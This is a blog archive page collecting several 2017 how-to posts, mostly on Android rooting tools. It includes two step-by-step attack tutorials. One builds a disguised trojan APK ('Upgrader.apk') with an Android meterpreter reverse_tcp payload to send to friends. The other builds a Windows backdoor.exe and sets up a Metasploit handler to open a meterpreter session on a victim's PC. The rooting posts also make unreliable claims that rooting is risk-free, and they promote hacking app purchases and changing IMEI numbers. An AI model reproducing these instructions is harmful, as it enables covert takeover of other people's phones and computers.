Showing posts with label guide. Show all posts
Showing posts with label guide. Show all posts

Saturday, May 6, 2017

HOWTO Hack Android Using Kali Guide

HOWTO Hack Android Using Kali Guide



In this Tutorial You will be guided How to Hack Android Using Kali. This a completely noob friendly tutorial . With Pics in each steps.
All that u need is just Kali Linux installed in your PC and a droid to hack
Step 1: Fire-Up Kali:
  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk(replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding
Step 2: Open Another Terminal:
  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole
Step 3: Set-Up a Listener:
  • After it loads(generally takes some time), load the multi-handler exploit by typing :use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4: Exploit!
  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (like:http://www.speedyshare.com).
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps fromUnknown Sources should beenabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open…
Step 5: BOOM!
There comes the meterpreter prompt:
Download Link
Kali linux

Go to link download

Read more »

Monday, May 1, 2017

BEST GUIDE ON HOW TO ROOT ANY DEVICE WITH OR WITHOUT PC 2015

BEST GUIDE ON HOW TO ROOT ANY DEVICE WITH OR WITHOUT PC 2015



Goodday to all Andriod Fans on IbjTechBlog. Here is an Exclusive Tutorial on How to Root an Andriod Phone easily following some really simple steps, This is the easiest and fully featured Tutorial on the Internet on How to Root Android Devices. Just as the Symbian User think of How to Hack their Symbian Phone & Sign their Apps, How iPhone/iPad Users think of How to Jailbreak their Devices to Make Use of Some Apps and Beats Off their Limitation, This is a Major Reason why Android Users need to Root their Android Phones to enjoy their Device to the Fullest.

WHY ROOT MY ANDROID DEVICE?
Let’s start with why you would want to root your Android smartphone. Sometimes apps require special permission that the Android OS, which is based on Linux doesnt allow. These could be simple as taking a screenshot to higher level permissions to the core Android files. Rooting makes your phone faster, increases battery life, allows it to run more apps, custom software and ROMs which allow complete control over every aspect of your device by allowing superuser and admin level permission. Removing carrier bloatware is a particularly enticing application. Hence, here’s a list of my top 10 reasons (in no particular order) that I consider worthy of rooting your device for, Check Here for Reason why you Should or Need to Root your Android Device Here, Lets proceed with the Tutorial for today.

Features Of Rooting !
  1. Faster software performance
  2.  Multi-touch
  3.  Better hardware performance
  4.  Apps2SD
  5. Tether your Wi-Fi or Bluetooth connection
  6.  Enhanced keyboard functions
  7.  Access hundreds of unavailable features 
  8.  More apps 
  9.  Freedom
Prepare your android device for rooting :
  1. Device must be charged 50% at least.
  2. Download & Install ADB (Android Debug Bridge) drivers [Link] For your device.
  3. Enable USB Debugging Mode on your device
  4. (For Earlier Android OS) Go To >> Settings >> Applications >> Development >> USB debugging
  5. (For (For Latest Android OS) Go to >> Settings >> Developer Options >> “USB debugging” >> enable “Stay Awake” Option Too.
  6. Also Enable “unknown sources” Option >> (If You Want To Root Without Using Computer).
 ROOT WITHOUT PC
This guide will let you root high end devices like Samsung Galaxy S6, Sony Z3 and as well as low end like Asus, Zenfone, Zte, Tecno, Infinix, SOLO, Itel, Micromax, Motorolla and so on.
For those new to the world of rooting, root access is often used to install custom recoveries, which then can be used to flash custom ROMs, kernels, and other device modifications. Root access also enables users to install the powerful and versatile Xposed Framework, which itself acts as a gateway to easy, non-destructive device modification.
But after rooting be sure to install a SUPER User  or a KING User app which allows root to only devices which you recognize and save you from harmful apps. Mostly, it gets installed after rooting automatically.

SuperUser – KingUser (To Unroot And Root)
One such useful superuser app is KingUser by KingxTeam.It is the best alternative to SuperSu and that too with android L material Design.

Root your device using:

KINGROOT – One click root tool.
2403567769ec2d1ddf2686c3a51063aa
KingRoot is an amazing tool for “lazy people” who just want to get root access but don’t want to flash any third party Recovery into their lovely device. It is one of the most famous root tool in China and now we release English version here for everyone, totally free and without AD.

FRAMAROOT – Root almost all devices.
Framaroot-
Now you can root your android device without PC, just use framaroot. This app including several exploits named as the heroes of the book “The Lord of the Rings” Gandalf, Boromir, Pippin, Legolas, Sam, Frodo, Aragorn and Gimli. You can install Superuser and su binary on phone or tablet from android version 2.x to 4.x.

TOWELROOT – If nothing works ..This will.
PicsArt_1433181463258
Created by Recognized Developer geohot, Towelroot is another root exploit app that is compatible with a large range of devices. The root exploit itself is built around Linux kernel CVE-2014-3153 discovered by hacker Pinkie Pie, and it involves an issue in the Futex subsystem that in turn allows for privilege escalation.So to sum it up..It ROOTS your device .

iRoot

iRoot has the advanced android root engine and secure android root technique make the success rate more than 90%.
Now more than 150,000 devices from Android OS 2.2 to 4.4 are supported by iRoot. This number is still growing.
You will be master of your android phone with just one click to root or unroot your android phone!
 How to Install And Root ? (For all Apps)
  1. Download the apks and install.
  2. Open.
  3. Do any one from below.
  4. Kingroot – Click root..Done.
  5. Framaroot – Choose Supersu and any character below…Done.
  6. Towelroot- Click Make it rain…Done.
  7. Done,Enjoy your rooted device.
Download Links
Kingroot v4.1.0 Apk (6.42 mb) | Mirrors
Framaroot v1.9.3 Apk (1.25 mb)| Mirrors
Towelroot Apk (0.11 mb) | Mirrors
iRoot Apk (4.2 mb) | Mirrors
KingUser v4.0.5 Apk (1.58 mb)| Mirrors
ROOT WITH PC
1. Wondershare MobileGo
Wondershare MobileGo is one of the best root software for Android you have ever seen. It’s an easy-to-use solution for rooting your Android phone or tablet in 1 click. Besides, it’s compatible with massive Android phones and tablets produced by Samsung, HTC, Sony, Motorola, LG, HuaWei, Acer, Google and more.
Pros
  • Fully compatible with Android 2.1 and up.
  • 100% safe and secured, no risk.
  • DOES NOT void warranty.
  • Support over 3, 000 Android phones and tablets.
  • Backup/restore import data before/after rooting.
  • Manage rooted Android phone or tablet in one place.
  • Free.
Cons
  • Not offer unroot function for the time being.
android rooting software

2. Kingo

Kingo is another free software for Android rooting. Like Wondershare MobileGo, it also enables you to root your Android phone or tablet in 1 click. It supports Android 2.3 up to Android 4.2.2, and works well with HTC, Samsung, Sony, Motorola, Lenovo, LG, Acer, and so on.
Pros
  • Fully compatible with Android 2.3 up to Android 4.2.2.
  • Enable to remove root at any time.
  • Free of charge.
  • Safe and risk-free.
Cons
  • Not support Android 4.4 or up.
android root software

3. SRSRoot

SRSRoot is a little rooting software for Android. With it, you can root your Android phone or tablet, as well as remove root access with a single click. It’s free of charge and provides you with two ways to root. One is Root Device (All Methods) the other is Root Device (SmartRoot).
Pros
  • Work well with Android 1.5 up to Android 4.2.
  • Support unroot.
Cons
  • Not support Android 4.4 or up.
root software for android

4. Root Genius

Like its name suggests, Root Genius is a smart Android root software created in China. It makes Android rooting simple, easy and fast.
Pros
  • Support more than 10,000 Android phones.
  • One click to root, simple an easy.
  • Enable to flash custom ROM, and remove built-in-apps after rooting.
  • Compatible with Android from 2.2 to 4.4.
  • Free
Cons
  • Not offer unroot function for the time being
root android software

5. iRoot

Just like Root Genius, iRoot is another powerful root software created by Chinese people. Just one click, and you can be the master of your Android phone or tablet.
Pros
  • Support thousands of Android phones.
  • High success rate of rooting.
  • Free of charge.
Cons
  • Not offer unroot function for the time being.
rooting software for android
6. OneClickRoot for Android
OneClickRoot is the world’s leading Android rooting software. With just a single click, you can root your Android smartphone or tablet and have access to hundreds of new and exciting features. Here are just a few of the reasons why more and more people round the world are rooting their Android devices:
  • Access more apps
  • Preserve battery life
  • Faster performance
  • Wi-Fi and Bluetooth tethering
  • Install custom ROMs
  • Access blocked features
  • And so much more!
Check Root Availability For Your Device Here
7. ROOTx v2.2 Root almost all Android Devices 
The ROOTx App can root almost any android at no cost or any installation of new roms !!
Compability
  • SAMSUNG GALAXY Y,Y DUOS AND ALL SGY MODELS
  • HTC (ONLY AFTER S-OFF AND GOLDCARD)
  • SAMSUNG GALAXY S SERIES
  • SONY EXPERIA Z, J, L (REST NOT TESTED)( unlocked bootloader only)
  • SAMSUNG ACE,ACE DUOS
  • KARBONN A5,A7,A7+
  • ALL MICROMAX ANDROID MODELS(Bootloader unlocked)
  • SWIPE TABLETS AND PHABLET (X74,X74S,HALO,AND ALL OTHERS)
  • Micromax bolt series(boot loader unlocked)
  • Samsung gt I5510/I550
  • Samsung galaxy Note/Note 2
  • Samsung Galaxy S4 (All Ee locked and us simlocked are supported!!) (New tested)
  • Samsung galaxy Grand/Spica
  • Samsung gt 551/t-red versions too (vietnamese)
  • MID Generic tablets (all versions)
  • DIFRNCE DIT4350
  • Karbonn A12, A15, A21, A30
  • fake galaxy s1,2,3,4 ( MKT DEVICES )
  • Karbonn Smart Tab 1,7,8,10
  • ( smart tab 2 is bootlocked with new firmware )
    FPT F8, KTouch w619 , Karbonn A5
  • Galaxy Note 800
  • Magicon MNote
  • Old XOLO FIRMWARES ( devices before A500 )
  • Sky Vega Racer IM-a770k ICS
  • Sky Vega Racer IM-a760k ICS
  • Pyle Astro PTBL92BC
  • Audiosonic 7? Quad Core T7-QC Tablet
How to install ?
  1. Plug your phone via USB Cable
  2.  turn on your device
  3. allow unsigned programs
  4. enable USB debugging and Choose an
  5. Choose an Option Below
  6. Type it in and hit enter Twice




If you enjoy my post, please take a moment to share!

If you want to consider UN-Rooting your device, then this post is for you:
Unroot Any Android Device Successfully

Is your Android device slow, try this: MAKE YOUR ANDROID SUPER FAST THIS 2015

Go to link download

Read more »

Thursday, April 6, 2017

How to Sign Up for the iOS 9 Public Beta Preview GUIDE

How to Sign Up for the iOS 9 Public Beta Preview GUIDE


How-to-Sign-Up-for-the-iOS-9-Public-Beta-Preview-GUIDE
How to Sign Up for the iOS 9 Public Beta Preview Guide
Now that Apple’s latest Worldwide Developer’s Conference (WWDC) is over, you can sign up for the public beta version of iOS 9 for your iPad or iPhone. For the first time in their history, Apple made a beta version of their mobile OS available to the general public just a few months ago, in the form of iOS 8.3, and they’ll continue that trend for the newest build.
While the download for iOS 9 won’t be available until July of this year, you can sign up to be notified when the download is up for grabs through the Apple Beta Software Program.
Sign Up for iOS 9 Through the Apple Beta Software Program
Start by going to the Apple Beta Software Program website and signing up, or signing in if you’re already an Apple beta tester. All you need to do is enter your Apple ID email and password.
Link
Apple Beta Software Program
Once you do that, you’re ready to go. When the public beta is released in July, you’ll see an option called “iOS Beta” which you’ll use to download the file and update your device.
iOS 9 brings many new features, including split-screen multitasking on the iPad, an updated Siri, low power mode, transit directions in Maps, better Spotlight search, formatting tools in Notes, a new News app, and much more.
As I mentioned above, the rollout for iOS 9 beta won’t begin until July of this year, so you’ll have to wait until Apple emails you about when the update is available.
Wish you enjoy, it! 
Guide Credits: WorldPcTricks Team

Go to link download

Read more »

Tuesday, March 28, 2017

Rooting Tools For All Android Devices Collection Guide

Rooting Tools For All Android Devices Collection Guide


Rooting-Tools-For-All-Android-Devices-Collection-with-Guide

Rooting Tools For All Android Devices [Collection] [Guide]
This is an ultimate guide to root android devices, with or without using computer, follow below provided instructions to gain root access on your android device without any technical knowledge, so let’s get started.. 
Features Of Rooting !
  1. Faster software performance
  2. Multi-touch
  3. Better hardware performance
  4. Apps2SD
  5. Tether your Wi-Fi or Bluetooth connection
  6. Enhanced keyboard functions
  7. Access hundreds of unavailable features 
  8. More apps 
  9. Freedom
Prepare your android device for rooting :
  1. Device must be charged 50% at least.
  2. Download & Install ADB (Android Debug Bridge) drivers [Link] For your device.
  3. Enable USB Debugging Mode on your device
  4. (For Earlier Android OS) Go To >> Settings >> Applications >> Development >> USB debugging
  5. (For (For Latest Android OS) Go to >> Settings >> Developer Options >> “USB debugging” >> enable “Stay Awake” Option Too.
  6. Also Enable “unknown sources” Option >> (If You Want To Root Without Using Computer).

Part 1. Best 5 Android Rooting Software to Root Android with Computer

In this part, I recommend best 5 root software for Android, which enables to root your phone or tablet from computer easily and conveniently.

1. Wondershare MobileGo

Wondershare MobileGo is one of the best root software for Android you have ever seen. It’s an easy-to-use solution for rooting your Android phone or tablet in 1 click. Besides, it’s compatible with massive Android phones and tablets produced by Samsung, HTC, Sony, Motorola, LG, HuaWei, Acer, Google and more.
Pros
  • Fully compatible with Android 2.1 and up.
  • 100% safe and secured, no risk.
  • DOES NOT void warranty.
  • Support over 3, 000 Android phones and tablets.
  • Backup/restore import data before/after rooting.
  • Manage rooted Android phone or tablet in one place.
  • Free.
Cons
  • Not offer unroot function for the time being.

2. Kingo

Kingo is another free software for Android rooting. Like Wondershare MobileGo, it also enables you to root your Android phone or tablet in 1 click. It supports Android 2.3 up to Android 4.2.2, and works well with HTC, Samsung, Sony, Motorola, Lenovo, LG, Acer, and so on.
Pros
  • Fully compatible with Android 2.3 up to Android 4.2.2.
  • Enable to remove root at any time.
  • Free of charge.
  • Safe and risk-free.
Cons
  • Not support Android 4.4 or up.

3. SRSRoot

SRSRoot is a little rooting software for Android. With it, you can root your Android phone or tablet, as well as remove root access with a single click. It’s free of charge and provides you with two ways to root. One is Root Device (All Methods) the other is Root Device (SmartRoot).
Pros
  • Work well with Android 1.5 up to Android 4.2.
  • Support unroot.
Cons
  • Not support Android 4.4 or up.

4. Root Genius

Like its name suggests, Root Genius is a smart Android root software created in China. It makes Android rooting simple, easy and fast.
Pros
  • Support more than 10,000 Android phones.
  • One click to root, simple an easy.
  • Enable to flash custom ROM, and remove built-in-apps after rooting.
  • Compatible with Android from 2.2 to 4.4.
  • Free
Cons
  • Not offer unroot function for the time being

5. iRoot

Just like Root Genius, iRoot is another powerful root software created by Chinese people. Just one click, and you can be the master of your Android phone or tablet.
Pros
  • Support thousands of Android phones.
  • High success rate of rooting.
  • Free of charge.
Cons
  • Not offer unroot function for the time being.
Part 2. Best  Root Apps for Android to Root Android without Computer
In this part, I recommend 2 root software for Android, which enables to root your phone or tablet from computer easily and conveniently.

1. SuperSU Pro

SuperSU Pro: SuperSU (Stands for super super user) is a root access app for Android, which can grant or deny access to root whenever any app requests root access. It will record your choice and allow those apps to access root without prompting. It also makes a log of root accesses.
Features
  • Root access prompting, logging, and notifications.
  • Temporarily unroot or completely unroot your phone or tablet.
  • Work even when Android is not properly booted.
  • Wake on prompt.
  • Work as system app.
  • Accesses it by dialing *#*#1234#*#* or *#*#7873778#*#* from the dialer even it is hidden from the launcher.
  • 4- Selectable themes Dark, Light, Light- Dark Actionbar, and Default device.
  • 5- Selectable icons for the app.
Advantages
  • Smooth app, no extra load on CPU.
  • No advertisement.
  • Can be hidden.
  • Small in size, just 2.2MB space.
Disadvantages
  • You cannot lock the app with a pin, but this feature is added in the Pro version which is a paid version of this app.
What are the steps?
  1. Download the apks from the link given below
  2. Install  the apks provided in the archive
  3. Open the app and update the su binary
  4. Enjoy! 
















2. Superuser

This app does almost the same as SuperSU. With this app you are going to get PIN protection for the fee, which is available after paying for it in the SuperSU.
This app is a little heavy compared to SuperSU, when it comes to CPU uses. The interface was not that good when the beta version was launched, but the official version is fine and runs smoothly. The developer of this app has announced that this app will always be free and no paid version will be launched ever.
Features
  • It provides multi user supports (android 4.2 onwards).
  • It is a totally open source project; you can find the source code at github.
  • PIN protection. It asks for PIN whenever it encounters a root access request.
  • Every app can be configured separately.
  • Root access prompting, logging, and notification features.
Advantages
  • It can handle multiple root access requests at a same time.
  • Updates very frequently in the marketplace, hence you will get added support to all the new Android versions almost instantly.
  • You can set the duration of request before they time out.
  • If you are looking for a free app, then you cannot find any app better than this one. You will never feel that you make a compromise by not going for a paid app.
  • No security voids in this app, everything is transparent.
Disadvantages
  • This app is a little bit heavy in terms of CPU uses
  • The interface could be made better, but this can be of personal preference. If I don’t like the interface doesn’t mean you will feel the same.
How To Install ?
  1. Uninstall Any Previously Installed SuperUser / SuperUserElite
  2. Install The Given SuperUser Elite Key From Below
  3. Install SuperUser 3.1.3 From Below
  4. You’re Done ! 
Go to link download

Read more »

Monday, March 20, 2017

How To Root Android Phone With App Easy Step Guide

How To Root Android Phone With App Easy Step Guide


How To Root Android Phone With App Easy Step Guide

Root Android
TODAYs time to Rooted android mobile is most important because if you are not able to buy a Big Price android phone for yourself then you can root your android phone to unlock its all other features and make it open source and in other case if you have a good phone like Samsung S6 Edge, Honor 4x, Honor Holly etc.,  Which are really well because of there specification and after root that types of Device (Android Phone) then you would be able to do many more fun thing with it there are many things are in this post which you can do after Root your android mobile. It is so simple to root your android phone by an android app of  6-7 Mb and then in 1 Click your device will rooted successfully without any problem. So First We Talking about Rooting Adavantage.

 Read Also- How To Hack Android Apps and Games Purchases

Follow Steps  To Root Android Phone With App In 1 Minute:

  1. Firstly Download The King Root App- Download Now
  2. Now Just Open The King Root App.
  3. Now Press Middle Button in Which Root Device Written.
  4. Your Android Phone Will Start Rooting Now Just Wait Till it Will 100% Within 1 Min. and Then Your Device Will Reboot (Restart) and After Reboot it Will Successfully Root Now Enjoy It.
 Also Check- How To Hack Whatsapp 100% Working Trick

What Is The Advantages Of Root Android Phone?

Android Root Advantages
MANY of you well Know that what is the advantages of your Android Phone but many not for who really dont know about the advantages of root you are is on good place. Basically when we root our Android Phone There is no change will held on it after rooted but you can manage your Androdi Phone with your choice there are many Tricks For Rooted Android Phone Like- Buy Unlimited Coins and Gems in Any Game, Premium Apps For Free, Manage Status Bar Them and Color, Make Your Notification Bar Transparent and Many others. So I Hope after you will rooted your Android Phone then your really enjoy it and there is no matter of Damage Your Mobile so Dont worry.

 Also Check- How To Use Free Internet In Airtel

Disadvantages Of Root Android Phone?

Android Root Disavantages
TRULLY There is No More Disadvantages of Rooting the Android Phone I Know that many peoples say that Android Phone Warranty will Finish Up After Root it But as My Experience Rooting The Android Phone is not mean your Android Phone Warranty will Finish up I Root My 3 Phones and When I was Goes to Service Centre They Didnt ask me That Why you root it or any other issue they just Fixed My Problem successfully as I experienced in My 3 phones. So Dont Worry it will not harm your Android Phone at Any reason but When you Root Your Android Phone Then Many Features are Unlocked and People Tries to Use More and More Features and During there process android gives Some issue but I Have solution For It If your Phone will giving any Problem if you use any other Feature Which you really Dont Know About it.

What Do When Android Shows A Problem During Using Root Features?

Android Recovery
BASICALLY you never in problem but in chance you are in and you cant able to Switch On your Android Phone Then you Have To Hard Reset It by Recovering which is really easy and Fastest Mode of Reset your Android Phone and Then your Phone Will Hard Reset every Virus if is in your Android Phone It Will Remove Successfully. Follow Steps For Hard Reset Android The All in One Solution For Every Problem.


  • Switch Off Your Android Phone
  • Now finger on Switch On Key and Volume Up key.
  • Now Press Both Key Together and Hold Till Your Mobile Switch on and Recovery Mode Will Open.
  • Now Your were see a Android Which Fall Down Now Press Switch On Key One Time.
  • Now By Pressing Volume Down Key Go To- Wipe Data/Factor Reset and Then Press Volume Up Key To Open It.
  • Now By Again pressing Volume Down Key Go To Yes Option in Middle and Press Volume Up Key On Yes.
  • Wait For a Min. Then Restart/Reboot Your Android Phone After Successfully Reset Process Completed.
Enjoy Your Phone will Free From Every Problem After Hard Reset It. Now your Android Phone have no Virus and Not any Other issue now Just use it freely without any problem.

What Exactly I Can Do By Rooting My Android Phone?

  • Buy Any Game Coins and Gems For Free or Hack Purchase Of Any App
  • Change Your Android Phone Imei Number.
  • Manage your Android Phone Status bar Theme and Colors.
  • Make Your Phone Look Like Other More Expensive Phones.


Important Message To You:

Guys I Think This Guide is To Big But By This You Can Learn About Root Android Phone and Its Adavantages and Disadvantages after Reading it you can Take Decisions With your Android Phone and Confidently you can Debit with anyone with your Knowledge i am 100% Sure That you never Lose it because this guide is really written by Expert and a Hacker Also. Thanks For Visiting on My Site Please Visit Daily and Read More Expensive Tricks.

Go to link download

Read more »

Thursday, March 16, 2017

Hack Windows Users with LINUX 2016 GUIDE

Hack Windows Users with LINUX 2016 GUIDE



Hacking Windows Users with Metasploit

Hi, welcome to IBJTech. Do you ever wanted to hack other’s computer in your life? If yes, well i’m here to help you. In this guide we are going to hack any Windows users by using Metasploit frameworks. Before we proceed, please read and understand these first.
Metasploit
A computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Exploit
An exploit is the means by which an attacker, or pentester for that matter, takes  advantage of a flaw within a system, an application, or a service. An attacker  uses an exploit to attack a system in a way that results in a particular desired  outcome that the developer never intended. Common exploits include buffer  overflows, web application vulnerabilities (such as SQL injection), and configuration errors.

Payload
A payload is code that we want the system to execute and that is to be selected  and delivered by the Framework. For example, a reverse shell is a payload that  creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that  “binds” a command prompt to a listening port on the target machine, which  the attacker can then connect. A payload could also be something as simple as  a few commands to be executed on the target operating system.

Meterpreter
An advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Requirements
  1. Pentesting Operating System (I recommend Kali Linux)
  2. Metasploit Framework (Already installed in most Security OS)
  3. Basic knowledge
Preparing the Backdoor
  • Open up your Terminal and type in this command
root@kali:~#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=88 X>backdoor.exe
  • Once the process completed, send the backdoor to your target.
Explanation
The command will set the Payload for our backdoor as reverse tcp for Windows. The LHOST and LPORT is the Ip address and port you want the victim to connect to. Change the LHOST to your IP address in LAN(Local Area Network) and not public/external IP address. You can lookup your IP by typing into Terminal ifconfig. If you want to target people on WAN(Wide Area Network) /Internet you need to port foward first and then you can use your Public/external IP Address. Not to forget, the LPORT number is up to you what number you want to put as long as the port is not in use by other service.
Prepare to Attack

  • Once again, open another terminal and type these commands
root@kali:~#service postgresql start
root@kali:~#service metasploit start
  • Or you can directly start the service by go to Application>Kali Linux>System Services>Metasploits>Start
  • After the initialization process completed, type msfconsole in the terminal. This will takes a moment.
  • Type in these command
msf > use exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST your_ip_here
msf exploit (handler) > set LPORT your_port_here
msf exploit (handler) > exploit
Explanation
As you can see the service postgresql start and service metasploit start is to start the service. The command use exploit/multi/handler and set PAYLOAD windows/meterpreter/reverse_tcp means that we are going to use metasploit handler and the same exploit that we used to make our backdoor earlier. If you type show options, you will see the LHOST and LPORT are not set up correctly. That’s why we need to set the LHOST and LPORT again with the IP address and port that we use previously for our backdoor. Exploit? I hope you know what that command does
Attacking
  • Lets say we have hit a target, so you will see this coming out from your terminal
[*] Started reverse handler on 162.198.37.130:86
[*] Starting the payload handler …
[*] Sending stage (769024 bytes) to 162.198.37.134
[*] Meterpreter session 1 opened (162.198.37.130:86 -> 162.198.37.134:49280 at 2015-07-18
meterpreter>
  • Once it says meterpreter session opened, you now can do anything as you like. For example see the Victim system info. Simply type in sysinfo in the terminal.
  • You also can download and upload files from/to Victim PC
  • For more commands, type in help and you will see bunch of commands
That’s all hope this helps!

Screenshots






Download Video
Tutorial Video (74.6MB) / Mirror

Go to link download

Read more »

Monday, March 13, 2017

How to Fix Pen Drive Shortcut Problem GUIDE

How to Fix Pen Drive Shortcut Problem GUIDE


How-to-Fix-Pen-Drive-Shortcut-Problem-GUIDE








Fix Pen Drive Shortcut Problem
USB Shortcut problem is now becoming more & more common. Due to fault reasons, this problem automatically starts appearing in a Pen Drive. In this, after entering the USB Drive, a shortcut get appearing in place of the content files of the pen drive, to access the original data you have to further click the shortcut.
We can easily solve this using either by a software or using Command Prompt. I will discuss both the methods here:
Method 1. Using a Software
USB Fix is a great software to fix shortcut and other virus related problems in USB Drives.
  1. Download USB fix and install it. (If your antivirus showing virus in this software then disable it for a few minutes)
  2. Close all the programs from taskbar, you are running, because when it start it auto close your all programs and you may lose your data.
  3. Connect all of your external storages to computer > Choose clean
  4. It automatically cleans your shortcut virus problems from all USB storages and don’t forget to restart your computer after using this tool because it make changes in windows directory and until you restart your computer, your computer will not work properly.
Screenshot










Method 2.  Using Command Prompt (cmd) 
  1. Press the Windows button and then in the run or search type “cmd”  and press enter. (To be simple “Start”  -> Run -> type cmd and click on OK.)
  2. Here I’ll assume your pen drive letter as K, and now enter the following command in the command prompt window. attrib -h -r -s /s /d k:*.* (See the below screenshot. There should be a backslash after k in the above command. So please see the command in the below screenshot).
  3. You can just copy the above command  and paste it in the command prompt. To do that right-click in the Command Prompt and select paste because keyboard shortcuts won’t work and now press enter.
  4. Now check for your files in Pen Drive and I’m sure that they were all normal as before.
Screenshot






Note
Don’t forget to replace the letter k with your pen drive letter.
Tips For avoiding Shortcut Virus
  • Don’t open USB before scanning
  • Don’t connect your storages to those computers who don’t have Antivirus Program
  • Avoid third party software’s
  • Keep up to date your antivirus program
  • Run boot time scans once in 2-3 weeks
  • Don’t open harmed websites
Download Links
USB Fix 7.95 [3 MB] | Mirror 1 | Mirror 2 | Mirror 3 | Mirror 4 | MultiMirrors

Go to link download

Read more »